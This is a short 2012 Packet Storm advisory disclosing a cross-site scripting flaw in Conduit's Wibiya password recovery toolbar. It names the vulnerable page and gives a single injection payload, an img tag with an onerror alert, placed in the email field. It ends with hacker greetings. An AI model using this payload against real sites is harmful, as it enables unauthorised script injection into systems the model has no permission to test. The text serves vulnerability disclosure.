Conduit Wibiya Password Recovery Toolbar Cross Site Scripting

2012-02-04T00:00:00
ID PACKETSTORM:109417
Type packetstorm
Reporter r007k17-w
Modified 2012-02-04T00:00:00

Description

                                        
                                            ` TITLE: Conduit wibiya password recovery toolbar Cross site Scripting  
vendor: Conduit  
Author: r007k17-w  
Email: n4gb07@gmail.com  
My blog: http://shadowrootkit.wordpress.com/  
Google Dork: © 2012 Conduit <http://www.conduit.com/>  
-------------------------------------------------------------------------------------------------------------------------------------------  
  
  
DEMO: http://wibiya.conduit.com/toolbar_password_recovery  
Password Recovery Toolbar  
POSTDATA: "'><img src=vul onerror=alert('r007k17-w')> in the 'email address  
field  
  
---------------------------------------------------------------------------------------------------------------------------------------------  
  
gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<  
),1nJ3ct0r t3am and all my friends  
  
-----------------------------------------------------------------------------------------------------  
`